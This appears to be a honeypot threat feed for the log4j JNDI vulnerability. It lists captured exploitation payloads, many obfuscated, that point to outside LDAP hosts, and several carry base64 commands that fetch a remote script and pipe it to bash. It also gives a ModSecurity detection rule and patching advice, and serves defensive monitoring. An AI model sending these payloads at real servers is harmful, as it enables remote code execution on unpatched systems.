log4j (JNDI) attack feed

Honeypot captures of CVE-2021-44228 exploitation attempts. Matching IPs are auto-added to the web_attacks blocklist in real time.

CVE

CVE-2021-44228

CVSS 10.0 · Critical

Probes shown

last 450 kB of log

Unique source IPs

in shown window

Disclosed

Dec 2021

still actively scanned

Live JNDI payloads

parsed from WAF · sensitive IPs anonymized to a.b.c.d

2022-01-12 sshd-honeypot1 source 162.241.69.182 URL HEAD / Referer - UA ${jndi:ldap://162.241.127.99:1389/a} 2022-01-12 sshd-honeypot1 source 69.49.228.92 URL HEAD / Referer - UA ${jndi:ldap://162.241.127.99:1389/a} 2022-01-12 sshd-honeypot1 source 69.49.235.93 URL HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9jbGVhbmJyb3dzaW5nLm9yZ3x8d2dldCAtcSAtTy0gMTYyLjI0MS4xMjcuOTk6MTM4OS9jbGVhbmJyb3dzaW5nLm9yZyl8YmFz Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9jbGVhbmJyb3dzaW5nL 2022-01-11 sshd-honeypot1 source 108.52.161.90 URL GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.153.240.94%3A1389%2Fdrydat%7D Referer - UA ${jndi:ldap://45.153.240.94:1389/drydat} 2022-01-11 sshd-honeypot1 source 79.143.186.150 URL GET / Referer https://google.com/${jndi:dns://6ppc9b34cfa1b2246b8afbf.y.psc4fuel.com/0tl73dFbB} UA Mozilla/5.0 2022-01-11 sshd-honeypot1 source 79.143.186.150 URL POST / Referer https://google.com${jndi:dns://6ppe74e30c7165e4eb798fb.y.psc4fuel.com/7nqigfrEe} UA Mozilla/5.0 2022-01-11 sshd-honeypot1 source 3.94.100.157 URL GET / Referer t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4 UA t('${${env:NaN:-j}ndi${env:NaN:-:${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NzaGRfY29u 2022-01-11 sshd-honeypot2 source 172.84.98.201 URL GET / Referer - UA ${jndi:ldap://binance.ath.cx:1389/a} 2022-01-11 sshd-honeypot2 source 172.84.98.201 URL GET / Referer - UA ${jndi:ldap://binance.ath.cx:1389/a} 2022-01-10 sshd-honeypot1 source 69.49.235.93 URL HEAD / Referer - UA ${jndi:ldap://162.241.127.99:1389/a} 2022-01-10 sshd-honeypot1 source 79.143.186.150 URL GET /$%7Bjndi:$%7Blower:l%7D$%7Blower:d%7Da$%7Blower:p%7D://5pp824281be3ca24a88b271.y.psc4fuel.com/m9cna%7D Referer - UA Mozilla/5.0 2022-01-10 sshd-honeypot1 source 162.241.69.182 URL HEAD / Referer - UA ${jndi:ldap://162.241.127.99:1389/a} 2022-01-10 sshd-honeypot1 source 79.143.186.150 URL GET / Referer https://google.com/${jndi:${lower:l}${lower:d}a${lower:p}://5ppf84fd83f874e45b88f8e.y.psc4fuel.com/TYwdJ} UA Mozilla/5.0 2022-01-10 sshd-honeypot1 source 162.241.114.189 URL HEAD / Referer - UA ${jndi:ldap://162.241.127.99:1389/a} 2022-01-10 sshd-honeypot3 source 162.241.114.189 URL HEAD / Referer - UA ${jndi:ldap://162.241.127.99:1389/a} 2022-01-10 sshd-honeypot3 source 162.241.114.189 URL HEAD / Referer - UA ${jndi:ldap://162.241.127.99:1389/a} 2022-01-09 sshd-honeypot4 source 2.58.149.206 URL GET / Referer t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuM UA t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgL 2022-01-09 sshd-honeypot1 source 79.143.186.150 URL GET /$%7B$%7BueLd:JghU:kyH:C:TURit:-j%7D$%7BodX:t:STGD:UaqOvq:wANmU:-n%7D$%7BmgSejH:tpr:zWlb:-d%7D$%7Bohw:Yyz:OuptUo:gTKe:BFxGG:-i%7D:ldap://127.0.0.1 Referer https://google.com/${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}:ldap://127 UA Mozilla/5.0 2022-01-09 sshd-honeypot1 source 79.143.186.150 URL POST / Referer https://google.com${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}:ldap://127. UA Mozilla/5.0 2022-01-08 sshd-honeypot1 source 79.143.186.150 URL GET /$%7Bjndi:$%7Blower:l%7D$%7Blower:d%7Da$%7Blower:p%7D://5ppf7bed300693243969356.y.psc4fuel.com/P11TX%7D Referer https://google.com/${jndi:${lower:l}${lower:d}a${lower:p}://5ppf7bed300693243969356.y.psc4fuel.com/P11TX} UA Mozilla/5.0 2022-01-08 sshd-honeypot1 source 79.143.186.150 URL GET / Referer https://google.com/${jndi:${lower:l}${lower:d}a${lower:p}://5ppd8badb3638fd48848000.y.psc4fuel.com/nbmKr} UA Mozilla/5.0 2022-01-07 sshd-honeypot1 source 79.143.186.150 URL GET /$%7B$%7BueLd:JghU:kyH:C:TURit:-j%7D$%7BodX:t:STGD:UaqOvq:wANmU:-n%7D$%7BmgSejH:tpr:zWlb:-d%7D$%7Bohw:Yyz:OuptUo:gTKe:BFxGG:-i%7D:ldap://127.0.0.1 Referer https://google.com/${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}:ldap://127 UA Mozilla/5.0 2022-01-07 sshd-honeypot1 source 79.143.186.150 URL GET / Referer https://google.com/${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}:ldap://127 UA Mozilla/5.0 2022-01-05 sshd-honeypot5 source 162.241.114.189 URL HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9zZWFyY2gubm9jLnNvY2lhbHx8d2dldCAtcSAtTy0gMTYyLjI0MS4xMjcuOTk6MTM4OS9zZWFyY2gubm9jLnNvY2lhbCl8YmFz Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9zZWFyY2gubm9jLnNvY 2022-01-05 sshd-honeypot1 source 79.143.186.150 URL GET /$%7Bjndi:$%7Blower:l%7D$%7Blower:d%7Da$%7Blower:p%7D://5pp6170995e890249cc83b7.y.psc4fuel.com/O04Tq%7D Referer - UA Mozilla/5.0 2022-01-05 sshd-honeypot1 source 79.143.186.150 URL GET / Referer https://google.com/${jndi:${lower:l}${lower:d}a${lower:p}://5pp4cb94585045d487c8962.y.psc4fuel.com/gdU1R} UA Mozilla/5.0 2022-01-05 sshd-honeypot1 source 172.111.36.142 URL GET / Referer t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuM UA t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgL 2022-01-05 sshd-honeypot2 source 162.241.121.96 URL HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9ic2JjYXBpdGFsLmNvbS5icnx8d2dldCAtcSAtTy0gMTYyLjI0MS4xMjcuOTk6MTM4OS9ic2JjYXBpdGFsLmNvbS5icil8YmFz Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9ic2JjYXBpdGFsLmNvb 2022-01-05 sshd-honeypot2 source 162.241.121.96 URL HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9ic2JjYXBpdGFsLmNvbS5icnx8d2dldCAtcSAtTy0gMTYyLjI0MS4xMjcuOTk6MTM4OS9ic2JjYXBpdGFsLmNvbS5icil8YmFz Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9ic2JjYXBpdGFsLmNvb 2022-01-04 sshd-honeypot6 source 142.162.49.147 URL GET / Referer - UA ${jndi:ldap://log4j-tester.trendmicro.com:1389/a9cf7f24-731b-4f74-9531-fb0822e352d8} 2022-01-04 sshd-honeypot7 source 69.49.228.92 URL HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC92aWFnZW5zZWNhbWluaG9zLmNvbXx8d2dldCAtcSAtTy0gMTYyLjI0MS4xMjcuOTk6NTA3NC92aWFnZW5zZWNhbWluaG9zLmNv Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC92aWFnZW5zZWNhbWlua 2022-01-04 sshd-honeypot7 source 69.49.228.92 URL HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC92aWFnZW5zZWNhbWluaG9zLmNvbXx8d2dldCAtcSAtTy0gMTYyLjI0MS4xMjcuOTk6NTA3NC92aWFnZW5zZWNhbWluaG9zLmNv Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC92aWFnZW5zZWNhbWlua 2022-01-04 sshd-honeypot8 source 69.49.228.92 URL HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS90aHJhc2gubWV8fHdnZXQgLXEgLU8tIDE2Mi4yNDEuMTI3Ljk5OjEzODkvdGhyYXNoLm1lKXxiYXNo} Referer - UA ${${::-j}${::-n${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS90aHJhc2gubWV8fHdnZX 2022-01-04 sshd-honeypot8 source 69.49.228.92 URL HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS90aHJhc2gubWV8fHdnZXQgLXEgLU8tIDE2Mi4yNDEuMTI3Ljk5OjEzODkvdGhyYXNoLm1lKXxiYXNo} Referer - UA ${${::-j}${::-n${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS90aHJhc2gubWV8fHdnZX 2022-01-04 sshd-honeypot9 source 162.241.114.189 URL HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC9wZXJlemJveC5jb218fHdnZXQgLXEgLU8tIDE2Mi4yNDEuMTI3Ljk5OjUwNzQvcGVyZXpib3guY29tKXxiYXNo} Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC9wZXJlemJveC5jb218f 2022-01-04 sshd-honeypot9 source 162.241.114.189 URL HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC9wZXJlemJveC5jb218fHdnZXQgLXEgLU8tIDE2Mi4yNDEuMTI3Ljk5OjUwNzQvcGVyZXpib3guY29tKXxiYXNo} Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC9wZXJlemJveC5jb218f 2022-01-04 sshd-honeypot10 source 162.241.121.96 URL HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9ub2Mub3JnfHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L25vYy5vcmcpfGJhc2g=} Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9ub2Mub3JnfHx3Z2V0I 2022-01-04 sshd-honeypot11 source 54.235.231.227 URL GET /?action=%24%7Bjndi%3Aldap%3A%2F%2Fkgmustangscom.j86fha.ceye.io%7D Referer ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://kgmustangscom.j86fha.ceye.io} UA Mozilla/5.0 2022-01-04 sshd-honeypot12 source 162.241.69.182 URL HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC9qdXN0bGlhLmNvbS5icnx8d2dldCAtcSAtTy0gMTYyLjI0MS4xMjcuOTk6NTA3NC9qdXN0bGlhLmNvbS5icil8YmFzaA==} Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC9qdXN0bGlhLmNvbS5ic 2022-01-04 sshd-honeypot12 source 162.241.69.182 URL HEAD /?x=${jndi:ldap://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC9qdXN0bGlhLmNvbS5icnx8d2dldCAtcSAtTy0gMTYyLjI0MS4xMjcuOTk6NTA3NC9qdXN0bGlhLmNvbS5icil8YmFzaA==} Referer - UA ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:5074/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6NTA3NC9qdXN0bGlhLmNvbS5ic

WAF rule · drop on match

ModSecurity v3

# Block any request containing a JNDI lookup. # Outpost-curated. SecRule REQUEST_URI|REQUEST_HEADERS|ARGS \ "@rx \$\{(\$\{[^}]+\}|j)ndi:" \ "id:920470,phase:2, deny,status:403, msg:'log4j JNDI attempt', tag:'cve/CVE-2021-44228'"

What to patch

FIX

Upgrade log4j ≥ 2.17.1

Earlier 2.x releases still allow lookups via nested patterns; only 2.17.1 fully removes them.

FIX

Disable JNDI lookups in formatMsg

Set log4j2.formatMsgNoLookups=true as a defense in depth.

FIX

Block outbound LDAP / RMI

Restrict outbound to known peers so a successful injection can't reach an attacker server.